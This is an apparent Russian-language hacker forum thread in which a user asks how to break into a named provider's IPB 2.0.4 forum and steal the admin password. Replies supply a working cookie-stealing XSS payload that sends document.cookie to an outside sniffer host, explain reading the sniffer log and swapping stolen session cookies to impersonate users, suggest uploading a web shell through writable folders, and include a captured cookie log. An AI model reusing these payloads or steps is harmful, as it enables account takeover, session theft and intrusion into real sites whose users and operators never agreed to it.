Есть форум (forum.prov.ru)
Знаю, что он на IPB, но проблемма в том, что я незнаю версию.
Скажите как взломать этот форум, и достать пароль админа ?
Только не надо все готовое - я сам хочу взломать.

Версия: _http://forum.prov.ru/admin.php
Как взломать: Сам же сказал, что сам хочешь. Поиск по форуму используй.

пробуй сплойт для ipb до 2.0.4 на rst.void.ru если не подойдет сплойт можно вывод что это версия форума либо 2.0.4 либо выше,наверно понятно =)

Если не получится сплойт, используй xss-уязвимость.

Бедный Azazel какой раз говорит что используете поиск прежде чем создавать тему.

Бедный Azazel какой раз говорит что используете поиск прежде чем создавать тему.
Азазель это же дама )
2diablo
если ето провайдера форум и у тебя получиться попасть в админку сможешь залить шелл через
смайлики или если неполучиться так прочитай
статью на сайте или в форуме есть тема я создавал
там как залить в папку открытую на запись
папки (/uploads/ u /lang/-воснавном ета папка открыта когда форум русифицируют ну где смотрел везде в нее есть доступ на запись
так вот главное можешь заить анонимайзер какойнить и получить инет нахаляву
----------------------------------------------------
1 если тебя спалят а это обязательно тебя либо отключат и ты заплатишь за штраф и за траффик
2.либо просто заплатишь за траффик

Бедный Azazel какой раз говорит что используете поиск прежде чем создавать тему.
Азазель это же дама )
Сам ты дама. Вот он я http://www.cofac.org/azazel.jpg
:):):)

Так, стоп. Версия форума - 2.0.4
Я там зарегестрирован.
Подробно - что делать дальше ?

Я там зарегестрирован.
Подробно - что делать дальше ?
А больше ничего делать и не нужно=))) лол
Ты прям так сказал вроде зарегаться на форуме это уже пол дела.
А если серьёзно, то попробуй XSS-атаку провести. Юзай поиск по форуму это уже не раз обсуждалось.

ЗЫ вот попробуй заюзать:

wj@wj.com ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`
С тебя репутация, если помог=))))

ЗЫ вот попробуй заюзать
Код для IPB:
wj@wj.com ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`
С тебя репутация, если помог=))))
А что это такое ? И куда писать ?

Это отправлять как сообщение =))

Это код, который нужно запостить на форуме или всунуть в подпись. А потом смотришь лог сниффера, который ты укажешь ( в примере это http://antichat.ru/cgi-bin/s.jpg?) и тама будут куки=)) Которые можно всунуть вместо своих или расшифроывть хэш и получить пароль юзера из чьих куков ты вытащил этот самый хэш. НО в твоём случае (IPB 2.0.4) расшифровать хэш неудасться. Тоесть под админом ты зайдёшь (если куки отснифаешь), но в админку не попадёшь. Фух=) Думаю всё понятно объяснил=))))

ЗЫ http://antichat.ru/cgi-bin/s.jpg? это сам сниффер, а лог находится по адресу http://antichat.ru/sniff/log.php

Почему это не расшифрует ? Вообщето они расшифровываются, видео Coyl'a смотри

D1mOn Я смотрел. А тебе хочу сказать, что этот способ вытаскивания СОЛИ имхо уже почти на всех форумах не пашет. А без соли до старости брутить будешь

Почему это не расшифрует ? Вообщето они расшифровываются, видео Coyl'a смотри
Блин.
1. Видео Coyl Для версий ниже 2.0.4
2. Он ломает через XSS, то есть соли у него нет!

Не вводи людей в заблуждение.

Azazel =)))))))))

Вот что получилось, после написания сообщения.

REFERER=http://forum.prov.ru/index.php?act=Post&CODE=08&f=15&t=3018&p=28228&st=
QUERY=member_id=[ТУТ МОЙ ID]; pass_hash=[И КАК Я ПОНЯЛ ХЭШ ТОЖЕ МОЙ]; forum_read=a:38:{i:6;i:1134040767;i:67;i:112980677 0;i:8;i:1134042471;i:15;i:1133611554;i:29;i:113076 1837;i:39;i:1133201153;i:53;i:1132441062;i:36;i:11 33359705;i:38;i:1133969210;i:42;i:1132508047;i:3;i :1133113948;i:16;i:1130760137;i:5;i:1133069997;i:7 ;i:1132494509;i:22;i:1133882625;i:0;i:1132854238;i :34;i:1131694957;i:45;i:1132471894;i:23;i:11324720 85;i:4;i:1133587911;i:2;i:1132494411;i:58;i:113327 0999;i:27;i:1133877568;i:50;i:1131688492;i:63;i:11 31702833;i:57;i:1131608719;i:40;i:1132654583;i:70; i:1131968061;i:41;i:1133028326;i:14;i:1131631814;i :59;i:1131695071;i:61;i:1131703952;i:37;i:11324714 39;i:32;i:1131710395;i:52;i:1131867491;i:12;i:1132 494525;i:51;i:1133271011;i:65;i:1134042675;}; anonlogin=-1; collapseprefs; open_qr=0; bbmode=normal; session_id=38219acbf90cc236847b83d355b503ae; modtids=,; topicsread=a:3:{i:2866;i:1134042466;i:177;i:113404 2366;i:3018;i:1134042916;}
AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.2 (build 01102))

Azazel
Я пробовал тот сплоит который был в видео на этом форуме у меня лн не пошел... Пробовал другие также.
Diablo
Ну правильно XSS работает... Теперь жди чтоб в место твоего ID и Хэша прилетели ID и Хэш Админа :)

Ну всё ок. Если ты по Id уверен, что это твои куки, то тогда жди другие=)) Потом когда будут не твои куки, то ты сможешь через Оперу (во встроенном редакторе кук) поменять свой хэш и Id на то, что тебе придёт=))) Вот и всё. После обновления страницы ты будешь тем, чьи куки пришли.